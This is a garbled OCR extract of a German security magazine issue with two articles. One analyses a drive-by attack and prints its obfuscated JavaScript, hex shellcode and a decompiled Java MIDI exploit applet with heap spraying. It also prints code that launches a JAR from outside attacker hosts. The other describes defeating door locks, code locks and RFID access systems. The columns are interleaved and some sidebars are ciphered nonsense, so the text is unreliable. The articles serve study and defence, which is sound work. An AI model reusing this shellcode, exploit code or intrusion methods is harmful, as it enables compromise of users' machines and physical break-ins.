=gio'<>~d'55%00%3c%84%40%47%000000 272617279410047657450726F634164647
000001000001100200000000000000000D 26573730057696E4578656300BB89F289F
0035D4266064660005400D10030001A000- 730C0AE75FD29F789F931C0BE3C0000000
0000410060A)}(Vcro'<B=iillA0A50Cet 3B51B02000066AD03851B0200008B70788
'b:es;eErs<Ee' ... 00000000000D01A 3C61C03B51B0200008DBD1F020000AD038
DD0001D100031400400D10084000000003 51B020000ABAD03851B0200005
0060LHehJ)";function jvfpb(blktgw) 0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
{return blktgw.replace(/'/ig,' 3A65974045E43EBE95E93D1E0038527020
').replace(/~/ig,'"').replace(/»/ 00031F69666ADC1E00203851F02000089C
ig,String.fromCharCode(0x2*0x5)). 6AD03851B020000C3EB100000000000000
replace(/<95>/ig,String. 000000000000000000089851B020000565
fromCharCode(0x2E*0x2));} 7E858FFFFFF5F5EAB01CE803EBB7402EBE
document.write('<p>1663</p>');var DC355524C4D4F4E2E444C4C0055524C446
ivypgs3=parseInt(document. F776E6C6F6164546F46696C65410070646
getElementById('greldm2'). 67570642E65786500637261736
getElementsByTagName(String. 82E70687000";
fromCharCode(0x70))[parseInt(String.
fromCharCode(0x30))].innerHTML);var /* nops for the nop-slice */
kwjse='';for (cqdqdsc = ivypgs3; String str10 = "90909090";
cqdqdsc > 0; cqdqdsc--){for (gtkvdm
= ivypgs3-cqdqdsc; gtkvdm <= cmjve3. String java_version = System.getProperty("java.
length; gtkvdm=gtkvdm+ivypgs3) version");
{kwjse=kwjse+cmjve3.
charAt(gtkvdm);}}var /* url YHUL¿FDWLRQ */
fnhld=kwjse+";";var isguhrd=jvfpb(fn String url = getParameter("data"); /* applet method */
hld);eval(isguhrd);</script> int i = 0;
int j = 0;
Listing 4a. Verifikation der als Parameter übergebenen while (url.charAt(i) != '?')
URL „http://arestyute.com/sadhbdsa879321jbdas/l. {
php?deserialize=6e&i=1”
j += url.charAt(i);
public void init() i += 1;
{ }
/* shellcode */ j += 7;
String str2 = "505351525657559CE8000000005D83ED0D31C06 j %= 256;
4034030780C8B400C8B701CAD8B4008EB0 String checksum = Integer.toHexString(j);
98B40348D407C8B403C5657BE5E0100000 /* checksum = 6e correct for the url
1EEBF4E01000001EFE8D60100005F5E89E * 'http://arestyute.com/sadhbdsa879321jbdas/l.
A81C25E010000526880000000FF954E010 php?deserialize=6e&i=1'
00089EA81C25E01000031F601C28A9C356 */
302000080FB007406881C3246EBEEC6043 if (url.indexOf("deserialize=" + checksum) == -1)
20089EA81C24502000052FF95520100008 return;
9EA81C2500200005250FF9

hakin9.org/de 13
FORTGESCHRITTENE

Listing 4b. Verifikation der als Parameter übergebenen


{
URL „http://arestyute.com/sadhbdsa879321jbdas/l.
php?deserialize=6e&i=1” String str19 = url + "11";
localObject4 = "";
Object localObject1; for (int k = 0; k < str19.length(); k++)
Object localObject2; {
Object localObject4; localObject4 = (String)localObject4 + Integer.
Object localObject5; toHexString(str19.charAt(k));
String str20; }
String str21; while (((String)localObject4).length() % 8 != 0)
String str22; {
localObject4 = (String)localObject4 + "26"; /* 0x26 =
if ((((java_version.indexOf("1.6.0_11") != -1) || '&' */
(java_version.indexOf("1.6.0_12") != -1) || }
(java_version.indexOf("1.6.0_13") != -1) || localObject4 = str2 + (String)localObject4;
(java_version.indexOf("1.6.0_14") != -1) ||
(java_version.indexOf("1.6.0_15") != -1) || this.mem = spray((String)localObject4, str10);
(java_version.indexOf("1.6.0_16") != -1) ? 1 : 0) & localObject5 = new URL((String)localObject1);
(url.indexOf("i=1") == -1 ? 1 : 0)) != 0) MidiSystem.getSequencer();
{ str21 = "";
/** MidiSystem.getSoundbank((URL)localObject5); /* <-- put
* Java midi vulnerable, see http:// in url here */
vreugdenhilresearch.nl/2010/05/ str22 = "";
java-midi-parse-vulnerabilities/ MidiSystem.getSequencer();
* for detailed explaination. The author claims, that it while (true) {
was ¿[HG in java 1.6.0_19 Thread.sleep(10L);
*/ }
localObject1 = ""; }
localObject1 = repeat('/', 303); catch (Exception localException2)
/* using windows ? no: return */ {
localObject2 = System.getProperty("os.name"). System.out.println(localException2);
toLowerCase(); }
if (((String)localObject2).indexOf("win") >= 0) }
localObject1 = repeat('/', 302); ...
else
return;
/* the core of the vulnerable: create a malicious url
and ask java's midiplayer to play
*/
localObject1 = ¿OH + (String)localObject1 +
"Z%Z%Z%Z%Z%Z%";
try

Zusätzlich wird noch das oben erwähnte verschleierte Zusammenfassend lässt sich feststellen, dass
JavaScript auf der ursprünglichen HTML Seite geladen. Schadsoftware auf verschiedensten Wegen ins Sys-
Dieses ist noch erstaunlicher, denn es enthält gleich ei- tem gelangen kann. Es ist nicht mehr notwendig
ne ganze Ladung von Exploits für Java, Adobe Flash Programme zu installieren oder ähnliches. Die hier
sowie Adobes PDF Reader bereit. Der ‚Author‘ der Sei- beschriebene HTML-Datei könnte auch in einem
te war auf höchste Kompatibilität aus, denn auch hier HTML-fähigen E-Mail-Client ausgeführt werden.
werden nur bestimmte – vor allem neuere – Versionen Ebenso kann die iFrame-Konstruktion in E-Mails
der Browser Plugins unterstützt (vgl. Listing 5.). platziert werden. Es sind nicht nur einzelne Pro-
Unter "http://www.exploit-db.com/exploits/12117/" fin- gramme oder PlugIns für Browser betroffen, son-
det man eine Beschreibung der Schwachstelle. Diese dern es wird versucht gezielt neue Schwachstellen
betrifft zusätzlich zum analysierten Applet die Java Ver- für mehrere populäre Programme zu finden, was der
sion 1.6.0_19. letzte Ausschnitt des JavaScript Codes zeigt. Auch

14 10/2010
Malware-Doppelschlag per JavaScript und JavaApplet

Listing 5. Codefragment des entschleierten JavaScript


verdeutlicht das Potential: } else {
var o = document.createElement('OBJECT');
var fdata; var n = document.createElement('OBJECT');
var skd='%u5350%u5251%u5756%u9c55%u00e8%u0000%u5d00% o.type = 'application/npruntime-scriptable-
ued83% ... %u6870%u0070'; plugin;deploymenttoolkit';
var skd1=skd + '%u7468%u7074% ... %u0038%u9000'; n.type = 'application/java-deployment-toolkit';
var skd2=skd + '%u7468%u7074% ... %u0032%u9000'; document.body.appendChild(o);
document.body.appendChild(n);
function JAVASMB() { try {
try { o.launch(u);
/* see http://www.exploit-db.com/exploits/12117/ for } catch (e) {
exploit description */ n.launch(u);
var u = 'HTTP: -J-jar -J\\bittoram.com\smb\old. }
avi http://arestyute.com/ }
sadhbdsa879321jbdas/l.php?i=2 } catch (e) {
none'; IEPEERS();
if (window.navigator.appName == 'Microsoft Internet }
Explorer') { IEPEERS();
try { }
var o = document.createElement('OBJECT'); ...
o.classid = 'clsid:CAFEEFAC-DEC7-0000-0000- JAVASMB();
ABCDEFFEDCBA';
o.launch(u);
} catch (e) {
var o2 = document.createElement('OBJECT');
o2.classid = 'clsid:8AD9C840-044E-11D1-B3E9-
00805F499D93';
o2.launch(u);
}

das Verbieten von JavaScript 3, was moderne, Ajax- nen, bevor entsprechende Signaturen bereitstehen.
basierte Internetseiten nahezu unbenutzbar macht, Weiterhin sollte der ausgehende E-Mail-Verkehr mit
hätte auf das Laden des Java Applets keine Auswir- gleicher Sorgfalt auf Spam und Viren geprüft wer-
kung. den wie der eingehende. Nur so kann man feststel-
Wie kann man derartigen heterogenen Bedrohun- len, ob man bereits ungewollt zum Spam- und Viren-
gen begegnen? Das häufigste Einfallstor für Schad- versender geworden ist. Am besten funktioniert dies
software bleibt die E-Mail. Also ist die Absicherung mit einer ausgelagerten E-Mail-Sicherheitslösung, da
der E-Mail-Kommunikation der erste und wichtigs- der Anbieter meist von der Masse der empfangenen
te Schritt zur Sicherung des Systems. Moderne An- und analysierten E-Mails profitiert, sprich Bedrohun-
ti-Spam und Anti-Virenprogramme sind in der Lage gen meist schneller erkennt als der einzeln agieren-
Massenmails mit gefährlichen Anhängen zu erken- de Mail-Server-Administrator. Und letzen Endes gilt
immer noch: Öffnen Sie keine E-Mails oder Anhänge
t <>'àSEJF"OBMZTFLBOOIJFS[#4QJEFSNPOLFZPEFS'JSF von Unbekannten.
CVHCFOVU[UXFSEFO
t <>v%JF+BWB7JSUVBM.BDIJOFCJFUFUOFCFOEFS1MBUUGPSN
VOBCIÊOHJHLFJU BVDI FJOFO (FXJOO BO 4JDIFSIFJU 4JF
àCFSXBDIU [VS -BVG[FJU EJF "VTGàISVOH EFT 1SPHSBNNT 
WFSIJOEFSU BMTP [#  EBTT FJO 1SPHSBNN àCFS "SSBZHSFO
[FO IJOXFH MJFTU PEFS TDISFJCU *N TQF[JFMMFO 'BMM WPO +B
WB GÊMMU EJFTF ÃCFSXBDIVOH TFIS FJOGBDI BVT  EB +BWBLF
JOF;FJHFSVOUFSTUàU[U4PNJUXFSEFO1VòFSàCFSMÊVGFWFS
IJOEFSU EJFWPSBMMFNCFJEFOJO$PEFS$ HFTDISJFCF
OFO 1SPHSBNNFO WPSLPNNFO LÚOOFOi 2VFMMF http://de-
.wikipedia.org/wiki/Java_Virtual_Machine
t <>.JU#SPXTFSFSXFJUFSVOHFOXJFCTQXOPTDSJQUGàS'JSF
fox. MICHAEL PEICK
Entwickler und Mitglied des eleven Research Teams

hakin9.org/de 15
Penetration Testing im Jahre 2010

Penetration Testing
im Jahre 2010
Dimitri Roschkowski
Viele Administratoren übersehen leider bei der Absicherung
des Netzwerkes seine physikalische Sicherheit. Die
Bedrohung kommt nicht nur durch das Ethernet-Kabel.

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...


t NJU XFMDIFO .JUUFMO IFVUJHF 4JDIFSIFJUTTZTUFNF àCFSMJTUFU t XFMDIF4ZTUFNFTFU[FJDI[VS"CTJDIFSVOHFJO
werden können
t XFMDIFTJDIFSFO"MUFSOBUJWFOFTHJCU

m Jahr 2010 ist es kein Problem mehr, ein Netzwerk

I
Kundenverkehrs nicht abgeschlossen. Die Tür zum
vor Gefahren zu schützen. Firewall-Hardware gibt es Serverraum stand wohl wegen der Abwärme sperran-
mittlerweile zu erschwinglichen Preisen. IT-System- gelweit offen, im Schloss des Racks steckte der Schlüs-
häuser holen sich Sicherheitsexperten und richten mit sel. Es gab nichts und niemanden, der mich davor ab-
deren Unterstützung ein sicheres Netzwerk ein. Mitar- halten konnte, aus jedem Server jeweils eine Festplatte
beiter werden im Umgang mit der IT-Technik geschult, einzustecken und blitzschnell das Gelände zu verlas-
sodass Phishing und Social Engineering Angriffe erfolg- sen. Weder der Geschäftsführer noch die IT-Adminis-
los verlaufen. IDS und IPS Systeme finden verdächtige tration hat mit einem so dreisten und einfachen Angriff
Aktivitäten im Netzwerk und zeigen diese dem Adminis- gerechnet.
trator an. Die IEEE 802.1X Authentifizierung an Access In dem folgenden Artikel werde ich die aktuelle Si-
Points und Netzwerkswitches verhindern den Zugang cherheitstechnik vorstellen und aufzeigen, wie ein-
von unbekannten Computern zum Netzwerk. Mit IEEE fach diese Technik zerstörungsfrei mit und fast spurlos
802.1Q (Virtual Local Area Network oder kurz VLAN) überlistet werden kann. Dieser Artikel ist keine Anlei-
werden Netzwerke segmentiert, obwohl alle Compu- tung, wie man einbricht, er soll lediglich die Schwach-
ter hardwareseitig an einem Switch hängen. Mit diesen stellen der heute massenhaft eingesetzten Systeme
Techniken ist man in der Lage ein Netzwerk sowohl vor aufzeigen. Aus diesem Grund habe ich mich bei den
Angriffen aus dem WAN als auch aus dem Inneren LAN Beschreibungen kurz gefasst sowie einige Details
zu schützen – würde man meinen. weggelassen.

Die Realität Zugefallene Türen


Ich wurde von einem mittelständischen Unternehmen Was ist eigentlich eine zugefallene Tür? Rund 95% al-
engagiert einen Penetrationstest durchzuführen. Wäh- ler Türen haben heute ein Schloss mit einer Falle. Wird
rend der Footprinting-Phase habe ich sehr schnell er- die Tür zugezogen, fällt die Schlossfalle in die dafür
kannt, dass die IT-Sicherheit bei diesem Unternehmen vorgesehene Öffnung des Schließbleches in der Türz-
ein sehr sensibles Thema ist. Doch trotz fast paranoider arge. Die Tür lässt sich dann entweder mit dem Tür-
Sicherheitsvorkehrungen, ist es mir erfolgreich gelun- griff oder durch das drehen des Schließzylinders wieder
gen, dem Unternehmen die Kundendaten zu entwen- öffnen (wenn z.B. auf einer Seite ein Knauf statt eines
den. Zwar war IT-Technisch alles abgesichert, der phy- Angriffes angebracht ist). Mit dem Schlüssel reicht ei-
sische Zugang zu den Daten war es allerdings nicht. ne halbe Umdrehung aus, um die Tür wieder zu öffnen.
Die Eingangstür des Unternehmens war wegen des Bei elektronischen Schließsystemen erfolgt die Freiga-

hakin9.org/de 17
PRAXIS

be dabei nicht an der Schlossfalle freigegeben, sondern Um so etwas zu verhindern, bieten sich sogenannte
am Schließblech. Doppelfalztüren an. (Abbildung 2.) Diese Türen haben
einen zweiten Knick im Rahmen und Türblatt. Eine an-
Wie lässt sich eine zugefallene Tür öffnen? gesetzte Öffnungsnadel kommt damit nicht mehr an die
Zugefallene Türen lassen sich ganz einfach öffnen. Schlüs- Schließfalle ran und eine Öffnung wird damit verhindert.
seldienste verwenden hierfür Öffnungsnadeln. (Abbildung Mit einer sogenannten „Mach Auf“ Faltkarte lässt sich
1.) Diese Öffnungsnadeln werden in Höhe der Schlossfalle aber auch dieses Hindernis überwinden.
zwischen Türzarge und Türblatt angesetzt, zieht man jetzt Damit eine Tür mit diesen Techniken nicht geöffnet
den hinteren Teil der Öffnungsnadel nach oben, drückt der werden kann, hilft es nur diese Tür abzuschließen.
vordere Teil die Schließfalle wieder ins Schloss zurück – die Dabei wird mindestens ein Riegel in das Schließblech
Tür ist damit offen. Mit etwas Übung dauert es nicht länger geschoben, der ohne Schlüssel nicht mehr zurückge-
als fünf Sekunden, um eine Tür zu öffnen. schoben werden kann. Das Abschließen einer Tür mit
Schlüssel ist jedoch nicht komfortabel. Diese Schwä-
che haben die Schlosshersteller erkannt und bie-
ten selbstschließende Schlösser an. Diese Schlös-
ser schieben automatisch beim zufallen die Riegel
in das Schließblech. Betätigt man die Türklinke, wird
gleichzeitig die Schlossfalle und die Riegel zurückge-
schoben, die Tür ist wieder offen. Je nach Modell des
Schlosses braucht man aber weiterhin eine bis zwei
Umdrehungen mit dem Schlüssel, um diese Tür zu öff-
nen.
Diese Schlösser sind allerdings nicht für Türen ge-
eignet, die über eine Elektronik geöffnet werden sol-
len. Hierfür gibt es allerdings auch eine Lösung. Es
Abbildung 1. Zwei Sätze Öffnungsnadeln gibt Schlösser mit einer Elektronik und einem Elekt-
romotor, der dann bei einem entsprechenden Signal
das Schloss aufschließt und damit die Funktion eines
Schlüssels simuliert. Allerdings sind solche Schlösser
recht teuer.

Lockpicking – Der Zylinder als Angriffsziel


Eine weitere Schwachstelle einer Tür ist der Zylinder.
Ein Laie kann nicht erkennen, ob die Mechanik eines
Zylinders sicher ist oder mit entsprechendem Werkzeug
sekundenschnell überlistet werden kann. Für ihn zählt
lediglich der Preis und die Logos auf der Verpackung,
um die Sicherheit beurteilen zu können. Hier gilt aller-
dings ausnahmsweise der Grundsatz: billig = schlecht,
teuer = gut, wobei man dazu anmerken muss, dass
man die oberste Preiskategorie der Zylinder wählen
muss, um tatsächlich eine hohe Sicherheitsstufe her-
stellen zu können. Dass man Zylinder öffnen kann, liegt
an der (Massen-)Herstellung dieser mechanischen Ge-
räte. Jedes Produkt weist gewisse Toleranzen auf, je
größer diese Toleranzen sind, desto leichter lässt sich
der Zylinder überlisten.

Wie Funktioniert ein Schließzylinder?


Ein Schließzylinder besteht aus einem Gehäuse (hell-
grau) und einem Kern (dunkelgrau). Kernstifte (gelb)
und Gehäusestifte (rot) verhindern, dass der Kern ge-
dreht werden kann. Führt man nun einen Schlüssel in
den Schließkanal (weiß) ein, drücken die Zähne des
Schlüssels die Kernstifte herunter sodass der Über-
Abbildung 2. Eine Öffnungsnadel an einer Doppelfalztür gang zwischen den Kernstiften und den Gehäusestif-

18 10/2010
Penetration Testing im Jahre 2010

ten genau zwischen dem Kern und dem Gehäuse ist. te Werkzeug meiner Sammlung vor – benutzt man das
In diesem Zustand lässt sich der Kern drehen und ein „Flip-It“ Werkzeug. Dieses Werkzeug nutzt die physika-
Schloss aufschließen. lische Trägheit aus, indem der Zylinder so schnell dreht
Ich möchte hier drei Methoden vorstellen, mit denen wird, dass die Federn es nicht schaffen, die Stifte in den
ein Schließzylinder ohne Schlüssel zerstörungsfrei ge- Kern zu drücken. Dazu spannt man den „Flip-It“ erst
öffnet werden kann. Beim klassischen Handpicken geht einmal in der Richtung vor, in der der Zylinder gedreht
es darum, die Sperrstifte eines Schlosses so zu mani- werden soll, dann führt man es in den Schließkanal ein
pulieren, dass diese den Kern freigeben. Zunächst wird und drückt den Auslöser. Der Zylinder wird dann über
ein Spanner in den Schließkanal eingeführt und um ein die oberste Position gedreht und man kann das Schloss
paar Grad gedreht, sodass ein minimaler Drehmoment weiter öffnen.
auf die Sperrstifte wirkt. Geht man jetzt mit einem Hand- Man benötigt viel Übung, um einen Zylinder ohne
pick die einzelnen Sperrstifte ab, so lässt sich mit etwas Schlüssel öffnen zu können. Denn macht man es mit
Übung erfühlen, welcher Stift gerade am meisten Wi- Gewalt, kann die Mechanik im inneren beschädigt wer-
derstand bietet. Drückt man diesen Stift mit dem Hand- den. Dann lässt sich das Schloss nicht einmal mit dem
pick herunter, lässt sich der Kern ein kleines bisschen richtigen Schlüssel öffnen.
drehen, sobald der der Gehäusestift den Kern verlas-
sen hat. Diesen Stift hat man jetzt gesetzt. Nun sperrt Sichere Schließzylinder
ein anderer Sperrstift. In einem normalen Schloss gibt Sichere Schließzylinder gibt es in meinen Augen nicht.
es etwa fünf solcher Stifte. Hat man alle Stifte richtig Je nachdem welchen Aufwand und Kosten man auf sich
gesetzt, lässt sich der Kern drehen ist der Zylinder ist nimmt, wird man in der Lage sein, alle Zylinder zu um-
damit geöffnet. gehen. Einen aus meiner Sicht relativ sicheren Zylin-
Eine weitere Methode um einen Schließzylinder zu der bietet die Firma EVVA mit dem MCS (Magnet Code
öffnen sind Schlagschlüssel. Ein Schlagschlüssel ist System) an. Statt normaler Stifte arbeitet dieser Zylin-
ein spezieller aus Stahl gefertigter Schlüssel, der nur im der mit insgesamt acht Magnetrotoren. Wird ein Schlüs-
Profil in einen Zylinder passt. Die Zähne des Schlüssels
wurden auf die tiefst mögliche Position gefräst, außer-
dem wurde der Anschlag des Schlüssels um etwa ei-
nen Millimeter verkürzt, sodass der Schlüssel sich mit
leichtem Druck etwas tiefer ins Schloss einführen lässt
als vorgesehen. Zum Öffnen des Zylinders führt man
den Schlagschlüssel in den Zylinder ein und schlägt an-
schließend mit einem flexiblen Hammer auf den Schlüs-
sel. Den Schlagimpuls übertragen die Kernstifte auf die
Gehäusestifte, die dann nach unten gedrängt werden
und damit den Kern freigeben. Dreht man den Schlag-
schlüssel genau in diesem Moment (wenige Millisekun-
den nach dem Schlag), lässt sich der Kern drehen und
das Schloss öffnen.
Die dritte Methode ist ein Elektro-Pick. Ein Elek-
tropick arbeitet nach dem gleichen Prinzip, wie ein Abbildung 3. Ein Schließzylinder im Querschnitt. Links ist der
Schlagschlüssel, nur dass hier mehrere Schläge pro Zylinder abgeschlossen, rechts offen (Bildquelle: Wikipedia.de)
Sekunde auf die Sperrstifte erfolgen. Um einen Zylin-
der mit dieser Methode zu öffnen, führt man die Na-
del des Elektro-Picks sowie einen Spanner (entwe-
der einen normalen oder einen Drehspanner) in den
Schließkanal ein und schaltet den Pick ein. Anstatt
den Pick durchgehend laufen zu lassen, empfiehlt es
sich ihn in kurzen Sequenzen ein- und auszuschalten.
Sind die Sperrstifte in passender Position, lässt sich
der Kern drehen.
Bei allen drei vorgestellten Öffnungsmethoden hat
man bei abgeschlossenen Schlössern immer ein Pro-
blem. Hat man einen Zylinder um 360° gedreht, drü-
cken die Federn die Gehäusestifte wieder in den Kern
und man müsste den Zylinder erneut öffnen (picken). Abbildung 4. Werkzeugsatz zur zerstörungsfreien Öffnung von
Um das zu verhindern – und damit stelle ich das letz- Schlössern

hakin9.org/de 19
PRAXIS

sel mit richtiger Magnet-Codierung eingeführt, werden


die Rotoren in die Schließposition gebracht und der
Zylinder lässt sich drehen. Zusätzlich kann ein solcher
Zylinder mit einer Elektronik auf RFID Basis ausgestat-
tet werden. Zusätzlich zum Magnetcode wird noch ei-
ne elektronische Authentifizierung durchgeführt, bevor
dieser Zylinder trotz des richtigen Schlüssels gedreht
werden kann. So können z.B. verlorene Schlüssel ge-
sperrt werden oder um Mitarbeitern den Zutritt nur zu
bestimmten Zeiten zu gestatten.

Codeschlösser
Codeschlösser sind in der Regel zugefallene Türen und
lassen sich am einfachsten mit den bereits oben vor-
gestellten Methoden öffnen. In diesem Artikel möchte
ich aber auf eine weitere Schwachstelle hinweisen. Die
Abbildung 5. zeigt ein typisches Codeschloss, anhand
des Zylinders auf der rechten Seite kann jeder darauf
schließen, wie groß die Code-Tasten dieses Schlosses
in der Realität sind. Würde man eine Codeeingabe fil-
men, könnte man anhand der langen Handbewegun-
gen auf den Code schließen können.
Diese Schwachstelle lässt sich aber ganz einfach
schließen, indem man den Eingabetasten die Ziffern für
Abbildung 5. Ein EVVA-MCS Schlüssel jede Codeeingabe per Zufallsgenerator zuweist. Das
bedeutet, dass die obere linke Taste nicht permanent
die Ziffer 1 eingibt, sondern bei jeder Codeeingabe ei-
ne andere. Durch diese zufällige Anordnung der Zif-
fern auf den Tasten lässt sich nicht mehr anhand der
Handbewegung feststellen, welche Ziffer eingegeben
wurde. Umsätzen lässt sich eine solche Eingabetech-
nik mit Siebensegmentanzeigen oder mini-OLED-Bild-
schirmen unter durchsichtigen Tasten bzw. mit einem
Touchscreen.
In Indoor-Bereich trifft man vor einigen Räumen auf
eine einfachere Version von Codeschlössern. Bei die-
sen Schlössern liegt das Eingabeterminal direkt am
Schloss an, die Energieversorgung erfolgt über Bat-
terien. Im geschlossenen Zustand lässt sich die Tür-
klinke ohne Funktion herunterdrücken. Gibt man den
richtigen Code ein, wird ein Elektromagnet mit Strom
versorgt und Zieht einen Stift an, der die Türklinke mit
dem Schloss verbunden. Betätigt man jetzt die Türklin-
ke, so lässt sich die Tür öffnen. Da die Batterien in ei-
nem solchen Schloss möglichst lange halten sollen,
arbeiten die Schlösser mit einem recht geringen Ma-
gnetfeld. Dieses Magnetfeld kann man jedoch mit ei-
nem von außen angebrachten starken Magneten (sie-
he auch Abschnitt über Reed-Relais) simulieren und so
das Schloss öffnen. Im Übrigen lassen sich mit einem
starken Magneten auch einige ältere elektronische Zy-
linder öffnen.

Schließsysteme mit RFID-Tags


Abbildung 6. Ein Elektronisches Codeschloss an einer RFID steht für radio frequency identification, also
Gegensprechanlage für die Identifikation über Funkwellen. Diese Technik

20 10/2010
Penetration Testing im Jahre 2010

ist heute sowohl bei Unternehmen, als auch in Pri-


vathäusern (Autoschlüssel, Funk-Garagentoröffner)
sehr verbreitet und wegen des Komforts beliebt. Im
Wesentlichen besteht das System aus zwei Kompo-
nenten, einem RFID Lesegerät und den sogenannten
Tags. Mit den Tags können sich die Zugangsberech-
tigten Personen am Lesegerät identifizieren. Unab-
hängig davon, ob das Tag aktiv (mit einer eigenen
Energieversorgung) oder passiv (die notwendige
Energie liefert das Lesegerät) ist, wird der Identifi-
kationsvorgang vom Tag eingeleitet. In den einfach-
sten Fällen sendet das Tag unverschlüsselt die eige-
ne Seriennummer oder einen vorher eingespeicher-
ten Code, das Lesegerät empfängt den Code und
überprüft ob die Seriennummer oder der Code zu-
gangsberechtigt ist. In den wenigsten Fällen erfolgt
eine zusätzliche Kryptographische Authentifizierung
des Tags, die aber wegen der geringen Rechenka-
pazität und Energieversorgung sehr einfach ausfällt.

Wie kann man solche Systeme überlisten?


Das Zauberwort dazu lautet „Software Defined Ra-
dio“ (SDR). Mit einem SDR Tranceiver ist man in der Abbildung 7. Das Lesegerät reagiert auf eine Mifare-Classic Karte
Lage, die Kommunikation zwischen dem Tag und und lehnt den Zugang ab
dem Lesegerät aufzuzeichnen und auf einem Rech-
ner zu analysieren. Anschließend sendet man die
aufgezeichneten und eventuell bearbeiteten Daten
an das Lesegerät.

Wie läuft ein solcher Angriff ab?


Zunächst einmal muss man herausfinden, auf wel-
cher Frequenz die Kommunikation zwischen dem Le-
segerät und den Tags erfolgt. Dazu kann man über
den Herstellernamen des Lesegerätes und seinem
Produkt-Portfolio gehen oder einfach verschiedene
Tags ausprobieren. Wenn ein Tag mit dem einge-
setzten Lesegerät nicht kompatibel ist, erfolgt keine
Reaktion. Wird dem Tag der Zugang verweigert, so
zeigt das Lesegerät dies in der Regel an. Dann wird
ein SRD Tranceiver benötigt, der auf der benötigten
Frequenz arbeitet. Dazu verwende ich den USRP/
USRP2 Tranceiver mit einem passenden Daughter-
board und einer Richtantenne (700$/1.400$ + 275$
+ 100$). Der Vorteil dieses Universalsystems liegt
daran, dass man mit verschiedenen Daughterboard
unterschiedliche Frequenzen abdecken kann. Die
Richtantenne richtet man dann etwas seitlich auf das
Lesegerät aus und fängt mit der Aufzeichnung der
Daten in dem Frequenzbereich an. Bei Long Range
Tags (das Tag kann mehrere Meter vom Lesegerät
entfernt sein) reicht bei Unverschlüsselten Systemen
- wegen der höheren Sendestärke - die Aufzeichnung
einer Kommunikation aus. Passive Tags, wie RFID
Karten, senden ein viel schwächeres Signal, deshalb Abbildung 8. Eine Überwachungskamera hat eine Veränderung
sind die Aufzeichnungen oft gestört. In der Regel be- im Bild detektiert. Der veränderte Bildausschnitt wird in einem
nötigt man fünf bis zehn Aufzeichnungen um ein Mus- Rahmen angezeigt.

hakin9.org/de 21
PRAXIS

ter zu finden. Der Anfang der Übertragung ist immer berechtigte Tag wird ein privater und ein öffentlicher
gleich, in der Mitte gibt es einen variablen Bereich Schlüssel erzeugt. Der private Schlüssel wird in einer
und das Ende ist bei allen Aufzeichnungen ebenfalls Datenbank gespeichert, auf die das Lesegerät zu-
gleich. Damit ein Lesegerät nun dem virtuellen Tag greifen kann. Der öffentliche Schlüssel wird auf dem
den Zugang gewährt, säubert man zunächst einmal Tag gespeichert. Die Identifizierung erfolgt dann in
die Aufzeichnungen mit einigen Filtern. GNU-Radio mehreren Schritten. Wie oben bereits beschrieben,
bietet hierfür zahlreiche Möglichkeiten. Dann stellt fängt das Tag mit der Identifikation an, indem es dem
man sich aus mehreren Aufzeichnungen ca. drei Lesegerät seine Seriennummer mitteilt. Das Lesege-
möglichst ideale (hier braucht man etwas Erfahrung, rät generiert daraufhin eine Zufallszahl und sendet
ein gutes Auge und etwas Fingerspitzengefühl) Kom- diese mit der Seriennummer des Tags wieder zurück.
munikationen zusammen und sendet diese an das (Da die Kommunikation über Funk erfolgt, kann es
Lesegerät. Mindestens eine dieser Aufzeichnungen sein, dass zur gleichen Zeit mehrere RFID Tags aktiv
wird dann das Lesegerät akzeptieren und dem An- sind. Deshalb muss man während der Kommunikati-
greifer den Zugang gewähren. on stets angeben, für welchen Empfänger eine Nach-
Aus der Praxis kann ich sagen, dass etwa 90% al- richt bestimmt ist.) Das Tag empfängt die Nachricht,
ler RFID-Karten-Systeme sich nur mit der Serien- verschlüsselt diese mit dem öffentlichen Schlüssel
nummer des Tags zufrieden geben. Ältere Garagen- und sendet sie an das Lesegerät zurück. Kann das
toröffner arbeiten mit einem statischen Code. Neuere Lesegerät die empfangene Nachricht mit dem priva-
Garagentoröffner und einige Autohersteller nutzen ei- ten Schlüssel des Tags entschlüsseln und stimmt die
nen Rolling Code, um den Nutzer zu identifizieren. Im Nachricht mit der Zufallszahl überein, wird der Zu-
März 2008 wurde auch dieses System von Forschern gang gewährt.
der Ruhr-Universität Bochum geknackt. Zwei aufge-
zeichnete Kommunikationen genügen bereits für ei- Bewegungsmelder
ne Seitenkanalattacke. Ebenfalls wurde im Jahr 2008 Bewegungsmelder verwenden für die Bewegungsde-
die Verschlüsselung des Mifare-Systems per Rever- tektion Passiv Infrarot Sensoren (PIR). Jedes Objekt
se Engineering geknackt. Solche Verschlüsslungen emittiert eine Wärmestrahlung, ein PIR Sensor kann
verlangsamen nur den Angriff und machen ihn teurer. diese Strahlung messen. Um Bewegungen detektieren
zu können, wird der Sensor mit Bündellinsen in Be-
Gibt es auch sichere RFID-Systeme? reiche aufgeteilt. Ändert sich die einfallende Strahlung
Die gibt es durchaus. Hier verwendet man eine in einem Bereich um einen bestimmten Schwellwert,
asymmetrische Verschlüsselung. Für jedes zugangs- wird dies als Bewegung interpretiert. Der Schwellwert
sorgt außerdem dafür, dass statische Temperaturver-
Magnete sind kein Spielzeug änderungen der Umgebung nicht als Bewegung ge-
.BHOFUF EJFTFS %JNFOTJPO IBCFO FJO FYUSFN TUBSLFT .B deutet werden. Diese Funktionsweise ist leider Fehler-
HOFUGFME .BHOFUFO LÚOOFO CFJ GBMTDIFS )BOEIBCVOH OJDIU
anfällig, so kann z.B. ein kalter Luftstrom bereits einen
OVS 2VFUTDIVOHFO BO ,ÚSQFSUFJMFO IFSWPSSVGFO  TPOEFSO
4DIÊEFO BO 5FDIOJL IFSWPSSVGFO .FOTDIFO NJU )FS[TDISJUU Bewegungsmelder auslösen. Hierfür setzen bessere
NBDIFSO TPMMUFO EFTIBMC FJOFO 4JDIFSIFJUTBCTUBOE WPO NJO Bewegungsmelder (Dualmelder) zusätzlich noch ei-
EFTUFOT[XFJ.FUFSO[VTPFJOFN.BHOFUFOIBMUFO(MFJDIFT nen Ultraschall-Sensor ein. Nur wenn beide Sensoren
HJMUàCSJHFOTBVDIGàS#SJFGUBTDIFONJU.BHOFULBSUFO auslösen, wird eine Bewegung gemeldet. Damit sol-
len Fehlalarme verhindert werden. VdS-Anerkannte
Bewegungsmelder, die in Alarmanlagen verwendet
werden, lösen zusätzlich Alarm aus, wenn diese ab-
gedeckt werden.

Wie kann man Bewegungsmelder überlisten?


